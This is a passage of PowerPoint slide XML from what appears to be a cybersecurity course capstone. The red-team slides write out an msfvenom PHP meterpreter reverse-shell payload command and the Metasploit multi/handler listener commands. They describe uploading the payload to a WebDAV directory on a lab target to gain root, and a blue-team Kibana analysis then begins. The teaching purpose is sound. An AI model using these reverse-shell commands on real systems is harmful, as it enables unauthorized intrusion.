        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30A94C05-6F99-4E76-A587-A763298667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Subtitle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3624A589-532C-47E4-BC7B-BAF1F53B07A9}"/>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7E726269-6476-4459-AA8D-E6F156D355EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="1800225"/>
            <a:ext cx="24377700" cy="11283542"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>To set up the reverse shell payload, we need to run the tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -p php/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=192.168.1.90 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=4444 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Before starting preparing to exploit by Metasploit tool we need to p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>lace the reverse shell payload onto the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>WebdDAV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> directory:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3904AAA8-E398-4FDD-A1AA-F8E13C3B23EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295822" y="4775281"/>
            <a:ext cx="11105728" cy="8107766"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="163954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CF00-5B0E-4E04-9963-DDE8C93E2408}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit using Metasploit tool</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{626E9A03-AA69-4C56-90A4-AA9310A3E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Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52BC8D1C-3B3D-41A8-ACE7-6996EF3F2AEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="1857375"/>
            <a:ext cx="24377700" cy="11226392"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To prepare the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> listener and reverse shell exploit we need to run the commands:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to launch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set payload php/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>show options </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and point out they need to set the LHOST.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set LHOST 192.168.1.90</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9A65669-2A3F-4094-8085-E2834B848A53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179194" y="6115770"/>
            <a:ext cx="19242405" cy="3352079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A46B871-9869-4684-9D6E-813E6F623E4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1379538" y="9796790"/>
            <a:ext cx="21251862" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
                <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Then navigate to where we uploaded the reverse shell and click it to activate it. If it seems like the browser is hanging or loading, that means it has worked. And the listener </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
                <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
                <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t> will initiate.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220063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A6A4-3FFC-4F4E-984C-0E6A2664E6C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compromise the Target Machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5EB50F6-01FC-46BF-B140-3B1C7EA3AB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7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2D80324-DADB-43B6-8F38-6D85CCEF6410}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="2600325"/>
            <a:ext cx="14887575" cy="10267950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D50610F-57DD-44A7-A76E-900035CD642F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="1838325"/>
            <a:ext cx="24377700" cy="11245442"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Using the CMD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> on the listener to start navigating inside the victim files.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3171776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77"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1378" name="Google Shape;1378;p91"/>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NAME OF THIRD VULNERABILITY</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1379" name="Google Shape;1379;p91"/>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1380" name="Google Shape;1380;p9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Summary of the exploit:</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-508000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Applying the reconnaissance using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, weaponization using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and exploitation using Metasploit</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-508000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Achieving the root access by reverse shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="44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92"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1675963" y="4759216"/>
            <a:ext cx="21025800" cy="2193600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182825" tIns="91375" rIns="182825" bIns="91375" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="15000"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="12800"/>
              <a:t>Blue Team</a:t>
            </a:r>
            <a:endParaRPr sz="12800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="15000"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9600" b="0"/>
              <a:t>Analysing the Incident</a:t>
            </a:r>
            <a:endParaRPr sz="9600"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89"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1390" name="Google Shape;1390;p93"/>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a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1391" name="Google Shape;1391;p93"/>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1392" name="Google Shape;1392;p93"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="1762125"/>
            <a:ext cx="22942800" cy="11457075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kibana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> server to analyze the attack occurred on the Capstone machine will get the dashboard below:</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a cell phone&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63F37647-BDD2-4D3D-9A77-93B19419DD57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="849638" y="3379138"/>
            <a:ext cx="11509412" cy="9840061"/>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B541B7D5-520E-40EB-895C-CC276C44424E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12505314" y="3379137"/>
            <a:ext cx="11383386" cy="984006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87D72-9BA9-4BDB-BDCF-4A4E4AB83F18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kibana Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5661F9CB-148C-4551-8499-33B2624290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Subtitle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACDB0A97-FB05-4D51-BAF6-725CA394182A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{253AA2A3-3FAA-49FE-92DC-1415D07B7E77}"/>
              </a:ext>
